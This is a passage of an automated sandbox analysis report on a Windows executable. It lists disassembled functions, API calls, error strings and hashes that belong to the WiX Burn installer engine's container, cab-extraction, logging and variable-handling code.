                                                                                                                                                                  control_flow_graph 1290 91ebdb-91ec0b 1291 91ec80-91ec9e GetCurrentProcess * 2 DuplicateHandle 1290->1291 1292 91ec0d-91ec2b CreateFileW 1290->1292 1293 91eca0-91ecaa GetLastError 1291->1293 1294 91ecda-91ecdd 1291->1294 1292->1294 1295 91ec31-91ec3b GetLastError 1292->1295 1296 91ecb7 1293->1296 1297 91ecac-91ecb5 1293->1297 1300 91ece7-91ece9 1294->1300 1301 91ecdf-91ece5 1294->1301 1298 91ec48 1295->1298 1299 91ec3d-91ec46 1295->1299 1302 91ecb9 1296->1302 1303 91ecbe-91ecd8 call 911225 1296->1303 1297->1296 1304 91ec4a 1298->1304 1305 91ec4f-91ec64 call 911225 1298->1305 1299->1298 1306 91eceb-91ecf9 SetFilePointerEx 1300->1306 1301->1306 1302->1303 1320 91ec69-91ec7b call 911228 1303->1320 1304->1305 1305->1320 1309 91ecfb-91ed05 GetLastError 1306->1309 1310 91ed3c-91ed42 1306->1310 1315 91ed12 1309->1315 1316 91ed07-91ed10 1309->1316 1311 91ed72-91ed78 1310->1311 1312 91ed44-91ed48 call 93ee8b 1310->1312 1322 91ed4d-91ed51 1312->1322 1317 91ed14 1315->1317 1318 91ed19-91ed3a call 911225 1315->1318 1316->1315 1317->1318 1327 91ed6a-91ed6f call 911228 1318->1327 1320->1311 1322->1311 1326 91ed53-91ed65 1322->1326 1326->1327 1327->1311
                                                                                                                                                                  APIs
                                                                                                                                                                  • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,08000080,00000000,?,00000000,00000000,?,0091EE16,00917D9B,?,?,00917DDB), ref: 0091EC20
                                                                                                                                                                  • GetLastError.KERNEL32(?,0091EE16,00917D9B,?,?,00917DDB,00917DDB,00000000,?,00000000), ref: 0091EC31
                                                                                                                                                                  • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000002,?,00000000,00000000,?,0091EE16,00917D9B,?,?,00917DDB,00917DDB,00000000,?), ref: 0091EC85
                                                                                                                                                                  • GetCurrentProcess.KERNEL32(000000FF,00000000,?,0091EE16,00917D9B,?,?,00917DDB,00917DDB,00000000,?,00000000), ref: 0091EC8F
                                                                                                                                                                  • DuplicateHandle.KERNELBASE(00000000,?,0091EE16,00917D9B,?,?,00917DDB,00917DDB,00000000,?,00000000), ref: 0091EC96
                                                                                                                                                                  • GetLastError.KERNEL32(?,0091EE16,00917D9B,?,?,00917DDB,00917DDB,00000000,?,00000000), ref: 0091ECA0
                                                                                                                                                                  • SetFilePointerEx.KERNELBASE(?,00000000,00000000,00000000,00000000,?,0091EE16,00917D9B,?,?,00917DDB,00917DDB,00000000,?,00000000), ref: 0091ECF1
                                                                                                                                                                  • GetLastError.KERNEL32(?,0091EE16,00917D9B,?,?,00917DDB,00917DDB,00000000,?,00000000), ref: 0091ECFB
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorLast$CurrentFileProcess$CreateDuplicateHandlePointer
                                                                                                                                                                  • String ID: Failed to duplicate handle to container: %ls$Failed to move file pointer to container offset.$Failed to open container.$Failed to open file: %ls$crypt32.dll$d:\a\wix4\wix4\src\burn\engine\container.cpp$feclient.dll
                                                                                                                                                                  • API String ID: 2619879409-2007315626
                                                                                                                                                                  • Opcode ID: 604a9ef2f9289f14e6a21c79bed3248a2e68b54832f370dd42e9db5e337ba7f7
                                                                                                                                                                  • Instruction ID: efacc6e47b6f85f7abf25057491f39379d279b508b162bc1470682b1681f3141
                                                                                                                                                                  • Opcode Fuzzy Hash: 604a9ef2f9289f14e6a21c79bed3248a2e68b54832f370dd42e9db5e337ba7f7
                                                                                                                                                                  • Instruction Fuzzy Hash: F341E276B4062ABBD7219F18DC49FABBA6CEF08B60F014215FD54AB2C1D361DC9097E0
                                                                                                                                                                  Function 00913EC2 Relevance: 24.8, APIs: 5, Strings: 9, Instructions: 252sleepfiletimeCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetLocalTime.KERNEL32(00000000,00000000,00000001,0000000C,00000000,?,00000000,00000000,0000000C,00000000,00000000,00000000,00000000,00988FA8,?,00000000), ref: 00913FF5
                                                                                                                                                                  • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000001,00000080,00000000), ref: 00914064
                                                                                                                                                                  • GetLastError.KERNEL32 ref: 00914071
                                                                                                                                                                  • Sleep.KERNEL32(00000064), ref: 00914085
                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 0091412A
                                                                                                                                                                  Strings
                                                                                                                                                                  • Failed to copy temp path to return., xrefs: 009140E9
                                                                                                                                                                  • d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\pathutil.cpp, xrefs: 00913F3B, 00913FC7, 00914117
                                                                                                                                                                  • Failed to combine directory and log prefix., xrefs: 00913F2C
                                                                                                                                                                  • Failed to ensure temp file path exists: %ls, xrefs: 00913FB8
                                                                                                                                                                  • Failed to create temp file: %ls, xrefs: 009140BD
                                                                                                                                                                  • %ls_%04u%02u%02u%02u%02u%02u%ls%ls%ls, xrefs: 00914037
                                                                                                                                                                  • Failed to get temp folder., xrefs: 00913F5D
                                                                                                                                                                  • failed to allocate memory for the temp path, xrefs: 00914108
                                                                                                                                                                  • Failed to concatenate the temp folder and log prefix., xrefs: 00913F85
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CloseCreateErrorFileHandleLastLocalSleepTime
                                                                                                                                                                  • String ID: %ls_%04u%02u%02u%02u%02u%02u%ls%ls%ls$Failed to combine directory and log prefix.$Failed to concatenate the temp folder and log prefix.$Failed to copy temp path to return.$Failed to create temp file: %ls$Failed to ensure temp file path exists: %ls$Failed to get temp folder.$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\pathutil.cpp$failed to allocate memory for the temp path
                                                                                                                                                                  • API String ID: 1968021109-1379701186
                                                                                                                                                                  • Opcode ID: 99006ec0e77cd2d9b2f5e30d9297ffd2c685dc89afc88c2eb1ecc7409dc9cb25
                                                                                                                                                                  • Instruction ID: 0de33241394a6e4dcdb58488db9201d595e9c05cd4969dcafa690aaa6ac08cb7
                                                                                                                                                                  • Opcode Fuzzy Hash: 99006ec0e77cd2d9b2f5e30d9297ffd2c685dc89afc88c2eb1ecc7409dc9cb25
                                                                                                                                                                  • Instruction Fuzzy Hash: 45817472F4021DBBEB219B95CC46FEEBAB8AB5CB10F114115FA14B62D0D6749D81CBA0
                                                                                                                                                                  Function 0096B0E2 Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 192COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • EnterCriticalSection.KERNEL32(009AD4F0,00000000,00000000,00000001,0000000C,0000000C,?,0092A885,00000000,00000001,00988FA8,?,00000000,00000000,0000000C,00000000), ref: 0096B0F7
                                                                                                                                                                  • LeaveCriticalSection.KERNEL32(009AD4F0,?,0092A885,00000000,00000001,00988FA8,?,00000000,00000000,0000000C,00000000,00000001,00000000,00000000,00000000,00000008), ref: 0096B2F9
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CriticalSection$EnterLeave
                                                                                                                                                                  • String ID: Failed to combine the log path.$Failed to copy log path.$Failed to create log based on current system time.$Failed to ensure log file directory exists: %ls$Failed to expand the log path.$Failed to get log directory.$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\logutil.cpp$failed to create log file: %ls
                                                                                                                                                                  • API String ID: 3168844106-925379867
                                                                                                                                                                  • Opcode ID: de67c70b092e7da9bdbae77d752f763a0144a7da3e7556a0eba3ad07e9095b3b
                                                                                                                                                                  • Instruction ID: 10eea82c0c5ab9ddb456c6feb76fa5270cf0e0b10ec01ab75c26ffab7056a091
                                                                                                                                                                  • Opcode Fuzzy Hash: de67c70b092e7da9bdbae77d752f763a0144a7da3e7556a0eba3ad07e9095b3b
                                                                                                                                                                  • Instruction Fuzzy Hash: CC51D571B85318BBDB215B64CC56FEF3AECAF9AB54F010110F915FA1E1EB709D809A90
                                                                                                                                                                  Function 0093EE8B Relevance: 22.9, APIs: 6, Strings: 7, Instructions: 123COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,wininet.dll,?,00000000,?,00000000,?,?,0091ED4D,?,00000000,?,0091EE16), ref: 0093EEC9
                                                                                                                                                                  • GetLastError.KERNEL32(?,0091ED4D,?,00000000,?,0091EE16,00917D9B,?,?,00917DDB,00917DDB,00000000,?,00000000), ref: 0093EED6
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CreateErrorEventLast
                                                                                                                                                                  • String ID: Failed to copy file name.$Failed to create begin operation event.$Failed to create extraction thread.$Failed to create operation complete event.$Failed to wait for operation complete.$d:\a\wix4\wix4\src\burn\engine\cabextract.cpp$wininet.dll
                                                                                                                                                                  • API String ID: 545576003-3725142438
                                                                                                                                                                  • Opcode ID: 02422355ed227ee79068717d0556ed36ad6b73649fb66143990a2cbb37019cd0
                                                                                                                                                                  • Instruction ID: 2e08e77fb8cd131c0e9bd589c9a2b30650ee9fd6f26721aa344c03052c0db077
                                                                                                                                                                  • Opcode Fuzzy Hash: 02422355ed227ee79068717d0556ed36ad6b73649fb66143990a2cbb37019cd0
                                                                                                                                                                  • Instruction Fuzzy Hash: AE310673A8173A77E73153284C4AFBB695CEB44BA4F024621BE44BB2C1E6A4DC404AF4
                                                                                                                                                                  Function 0091A0D7 Relevance: 22.7, APIs: 2, Strings: 13, Instructions: 177COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • EnterCriticalSection.KERNEL32(00000000,00917D5B,00000000,00917DDB,?,?,0091B898,00000002,?,8D4BE800,00000000), ref: 0091A0E6
                                                                                                                                                                    • Part of subcall function 00918306: CompareStringW.KERNEL32(0000007F,00001000,?,000000FF,version.dll,000000FF,?,00000000,?,00919840,00919840,?,00918154,?,?,00000000), ref: 00918342
                                                                                                                                                                    • Part of subcall function 00918306: GetLastError.KERNEL32(?,00918154,?,?,00000000,?,00000000,00919840,?,0091B468,?,?,?,?,?), ref: 00918371
                                                                                                                                                                  • LeaveCriticalSection.KERNEL32(00000000,?,?,00000000,8D4BE800,00000000), ref: 0091A2AD
                                                                                                                                                                  Strings
                                                                                                                                                                  • string, xrefs: 0091A22A, 0091A232
                                                                                                                                                                  • Unsetting variable '%ls', xrefs: 0091A242
                                                                                                                                                                  • Setting numeric variable '%ls' to value %lld, xrefs: 0091A209
                                                                                                                                                                  • d:\a\wix4\wix4\src\burn\engine\variable.cpp, xrefs: 0091A17D, 0091A29F
                                                                                                                                                                  • Attempt to set built-in variable value: %ls, xrefs: 0091A188
                                                                                                                                                                  • Setting %ls variable '%ls' to value '%ls', xrefs: 0091A233
                                                                                                                                                                  • formatted, xrefs: 0091A223
                                                                                                                                                                  • Setting hidden variable '%ls', xrefs: 0091A1C6
                                                                                                                                                                  • Setting version variable '%ls' to value '%ls', xrefs: 0091A1F2
                                                                                                                                                                  • Failed to set value of variable: %ls, xrefs: 0091A28D
                                                                                                                                                                  • Setting variable failed: ID '%ls', HRESULT 0x%x, xrefs: 0091A2BF
                                                                                                                                                                  • Failed to insert variable '%ls'., xrefs: 0091A12E
                                                                                                                                                                  • Failed to find variable value '%ls'., xrefs: 0091A101
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CriticalSection$CompareEnterErrorLastLeaveString
                                                                                                                                                                  • String ID: Attempt to set built-in variable value: %ls$Failed to find variable value '%ls'.$Failed to insert variable '%ls'.$Failed to set value of variable: %ls$Setting %ls variable '%ls' to value '%ls'$Setting hidden variable '%ls'$Setting numeric variable '%ls' to value %lld$Setting variable failed: ID '%ls', HRESULT 0x%x$Setting version variable '%ls' to value '%ls'$Unsetting variable '%ls'$d:\a\wix4\wix4\src\burn\engine\variable.cpp$formatted$string
                                                                                                                                                                  • API String ID: 2716280545-2464245954
                                                                                                                                                                  • Opcode ID: c1a9dcca057a4622c1c1733d5ab2e8b45471d612972dde65c737c0b93a0039be
                                                                                                                                                                  • Instruction ID: 24f03168b5c83395f4ab210345e86a15cf9042fddd9c6b92c0106f214b3f231e
                                                                                                                                                                  • Opcode Fuzzy Hash: c1a9dcca057a4622c1c1733d5ab2e8b45471d612972dde65c737c0b93a0039be
                                                                                                                                                                  • Instruction Fuzzy Hash: 0F51D631B42318BBDB35AA558D4AFE73A6CEF91B14F100819F925662D2D2B2DDC0C693
                                                                                                                                                                  Function 0092A5BE Relevance: 21.4, APIs: 1, Strings: 13, Instructions: 364sleepCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • Sleep.KERNEL32(000007D0,00000008,?,00000000,00000000,?,?), ref: 0092A749
                                                                                                                                                                  Strings
                                                                                                                                                                  • Failed to copy log path to prefix., xrefs: 0092A903
                                                                                                                                                                  • Failed to copy default log extension., xrefs: 0092A706
                                                                                                                                                                  • d:\a\wix4\wix4\src\burn\engine\logging.cpp, xrefs: 0092A64C, 0092A66F, 0092A7DA
                                                                                                                                                                  • log, xrefs: 0092A6F5
                                                                                                                                                                  • Failed to copy full log path to prefix., xrefs: 0092A95B
                                                                                                                                                                  • Failed to get parent directory from '%ls'., xrefs: 0092A850
                                                                                                                                                                  • Failed to copy default log prefix., xrefs: 0092A6D3
                                                                                                                                                                  • Setup, xrefs: 0092A6C2
                                                                                                                                                                  • Failed to initialize logging., xrefs: 0092A660
                                                                                                                                                                  • Failed to copy log file path from command line., xrefs: 0092A63A
                                                                                                                                                                  • Failed to open log: %ls, xrefs: 0092A7C8
                                                                                                                                                                  • Failed to copy log extension to extension., xrefs: 0092A930
                                                                                                                                                                  • Failed to get non-session specific TEMP folder., xrefs: 0092A8A5
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Sleep
                                                                                                                                                                  • String ID: Failed to copy default log extension.$Failed to copy default log prefix.$Failed to copy full log path to prefix.$Failed to copy log extension to extension.$Failed to copy log file path from command line.$Failed to copy log path to prefix.$Failed to get non-session specific TEMP folder.$Failed to get parent directory from '%ls'.$Failed to initialize logging.$Failed to open log: %ls$Setup$d:\a\wix4\wix4\src\burn\engine\logging.cpp$log
                                                                                                                                                                  • API String ID: 3472027048-3437580743
                                                                                                                                                                  • Opcode ID: 7114ef5cf8e44e63ec9f2b397e95c23e5be4537827e2b26ca3132f34d0380ffd
                                                                                                                                                                  • Instruction ID: ee007211b7814fdd51c61010edb22ac0f921930bbb4e1e4d915df3c855266302
                                                                                                                                                                  • Opcode Fuzzy Hash: 7114ef5cf8e44e63ec9f2b397e95c23e5be4537827e2b26ca3132f34d0380ffd
                                                                                                                                                                  • Instruction Fuzzy Hash: B7B11532B40325BFEB21AF649C45FAB77ACAF44700F154525F901EB285E7B1DD808BA2
                                                                                                                                                                  Function 0093DE80 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 121fileCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • CompareStringA.KERNELBASE(00000000,00000000,<the>.cab,?,?), ref: 0093DEB0
                                                                                                                                                                  • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,?), ref: 0093DEC6
                                                                                                                                                                  • GetCurrentProcess.KERNEL32(?,00000000,?,?), ref: 0093DECF
                                                                                                                                                                  • DuplicateHandle.KERNELBASE(00000000,?,?), ref: 0093DED6
                                                                                                                                                                  • GetLastError.KERNEL32(?,?), ref: 0093DEE0
                                                                                                                                                                  • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,08000080,00000000,?,?), ref: 0093DF7F
                                                                                                                                                                  • GetLastError.KERNEL32(?,?), ref: 0093DF8C
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CurrentErrorLastProcess$CompareCreateDuplicateFileHandleString
                                                                                                                                                                  • String ID: <the>.cab$Failed to add virtual file pointer for cab container.$Failed to duplicate handle to cab container.$Failed to open cabinet file: %hs$d:\a\wix4\wix4\src\burn\engine\cabextract.cpp
                                                                                                                                                                  • API String ID: 3030546534-373254902
                                                                                                                                                                  • Opcode ID: e0ec23cf0ac6cf8e6a1ee86214092379d0127866db49cb855215a454256e295d
                                                                                                                                                                  • Instruction ID: b34d6341cae8be8721461731de21e923795403a97458eb893fdbb9da6999517f
                                                                                                                                                                  • Opcode Fuzzy Hash: e0ec23cf0ac6cf8e6a1ee86214092379d0127866db49cb855215a454256e295d
                                                                                                                                                                  • Instruction Fuzzy Hash: CF310777A52224B7EB216B999C4AF9F3E6CDF89B60F010150FE05BF1D1D6709C409AE0
                                                                                                                                                                  Function 009729EA Relevance: 19.4, APIs: 3, Strings: 8, Instructions: 112COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 00911839: LoadLibraryExW.KERNEL32(?,00000000,00000800,00000000,?,00911645,?,?,?,?,?,?,0091115A,cabinet.dll,00000009,?), ref: 00911855
                                                                                                                                                                    • Part of subcall function 00911839: GetLastError.KERNEL32(?,00911645,?,?,?,?,?,?,0091115A,cabinet.dll,00000009,?,?,00000000), ref: 00911866
                                                                                                                                                                  • CoTaskMemFree.OLE32(00000000,00000000,00000000,00916570,00000000,?,?,?,0097284A,00000000,?,00916C5C,00000000), ref: 00972B11
                                                                                                                                                                  • FreeLibrary.KERNEL32(00000000,00000000,00000000,00916570,00000000,?,?,?,0097284A,00000000,?,00916C5C), ref: 00972B20
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: FreeLibrary$ErrorLastLoadTask
                                                                                                                                                                  • String ID: Failed to backslash terminate shell folder path: %ls$Failed to copy shell folder path: %ls$Failed to find SHGetKnownFolderPath entry point.$Failed to get known folder path.$Failed to load shell32.dll.$SHGetKnownFolderPath$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\shelutil.cpp$shell32.dll
                                                                                                                                                                  • API String ID: 3444712580-2659096373
                                                                                                                                                                  • Opcode ID: 800eda45b4caa5d3b48763e95a0c362db99f122e2fc6e4585148480046423703
                                                                                                                                                                  • Instruction ID: 15833a1dafeb588dc1444440a8a9c73fcdb13fa09d0d6447bbee6ce711d1d5d3
                                                                                                                                                                  • Opcode Fuzzy Hash: 800eda45b4caa5d3b48763e95a0c362db99f122e2fc6e4585148480046423703
                                                                                                                                                                  • Instruction Fuzzy Hash: D031C432B90228B6EB326B958C0AFAF6E69DBD6B50F114155F9087A1D1E7F08E80D5D0
                                                                                                                                                                  Function 00932AD9 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 80COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetCurrentProcess.KERNEL32(000000FF,00000000,00000001,00000002,00000000,00000000,?,?,009334D1,00000000,?), ref: 00932AF3
                                                                                                                                                                  • GetCurrentProcess.KERNEL32(?,00000000,?,?,009334D1,00000000,?), ref: 00932AFD
                                                                                                                                                                  • DuplicateHandle.KERNELBASE(00000000,?,?,009334D1,00000000,?), ref: 00932B04
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,009334D1,00000000,?), ref: 00932B0E
                                                                                                                                                                  • CloseHandle.KERNEL32(000000FF,009334D1,00000000,?), ref: 00932BAF
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CurrentHandleProcess$CloseDuplicateErrorLast
                                                                                                                                                                  • String ID: -%ls=%Iu$Failed to append the file handle to the command line.$Failed to duplicate file handle for attached container.$burn.filehandle.attached$d:\a\wix4\wix4\src\burn\engine\core.cpp
                                                                                                                                                                  • API String ID: 4224961946-761155037
                                                                                                                                                                  • Opcode ID: 5ac82d8a59fa7bba04fc073803d8be018d1b63471153681a2b99cbb1fe318248
                                                                                                                                                                  • Instruction ID: 08c4a6c40ce35863b765873250f08921568593566c43e476ba3aced51a4eeb1c
                                                                                                                                                                  • Opcode Fuzzy Hash: 5ac82d8a59fa7bba04fc073803d8be018d1b63471153681a2b99cbb1fe318248
                                                                                                                                                                  • Instruction Fuzzy Hash: 9521F972A40319B7E7106BA89C0AF9FBB7C9F45720F100641FA24FB2D1E2709D509BA0
                                                                                                                                                                  Function 0091677F Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 92COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • InitializeCriticalSection.KERNEL32(00916C94,00000000,00000000,00000000,?,?,?,00917B5B,?,?,00000000,?,?,00000003,00000000,00916570), ref: 009167AF
                                                                                                                                                                  • InitializeCriticalSection.KERNEL32(00916C28,?,?,?,00917B5B,?,?,00000000,?,?,00000003,00000000,00916570,00000000), ref: 009167BC
                                                                                                                                                                  • InitializeCriticalSection.KERNEL32(0091663C,?,?,?,00917B5B,?,?,00000000,?,?,00000003,00000000,00916570,00000000), ref: 009167D3
